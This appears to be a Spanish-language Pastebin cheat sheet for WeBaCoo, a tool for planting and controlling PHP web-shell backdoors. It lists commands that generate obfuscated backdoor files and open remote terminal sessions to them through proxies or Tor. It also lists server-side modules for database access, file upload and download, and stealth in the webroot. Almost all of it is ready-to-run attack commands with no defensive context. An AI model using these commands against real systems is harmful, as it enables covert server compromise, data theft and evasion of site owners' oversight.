Advertisement
Pisher

Comandos en Webacoo

May 1st, 2016
164
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.58 KB | None | 0 0
  1. 1 .- Comandos por parte de WeBaCoo.
  2. 2 .- Comandos por parte del servidor.
  3.  
  4.  
  5. Comandos por parte de WeBaCoo
  6.  
  7.  
  8. 1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada:
  9. ./webacoo.pl -g -o backdoor.php
  10. 2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito":
  11. ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
  12. 3) Establecer "terminal" conexión con el host remoto usando la configuración por defecto:
  13. ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
  14. 4) Establecer "terminal" conexión con el host remoto al configurar algunos argumentos:
  15. ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
  16. 5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP:
  17. ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
  18. 6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con autenticación básica:
  19. ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
  20. 7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la actividad:
  21. ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt
  22.  
  23.  
  24.  
  25.  
  26. Comandos por parte del servidor
  27.  
  28.  
  29. 1) MySQL-CLI: MySQL Command Line Module:
  30. mysql-cli <IP(:port)> <user> <pass>
  31. 2) PSQL-CLI: Postgres Command Line Module:
  32. psql-cli <IP(:port)> <db> <user> <pass>
  33. 3) Upload: File Upload Module:
  34. upload <local_file> <remote_dir>
  35. 4) Download: File Download Module:
  36. download <remote_file>
  37. 5) Stealth: Enhance Stealth Module
  38. stealth <webroot_dir>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement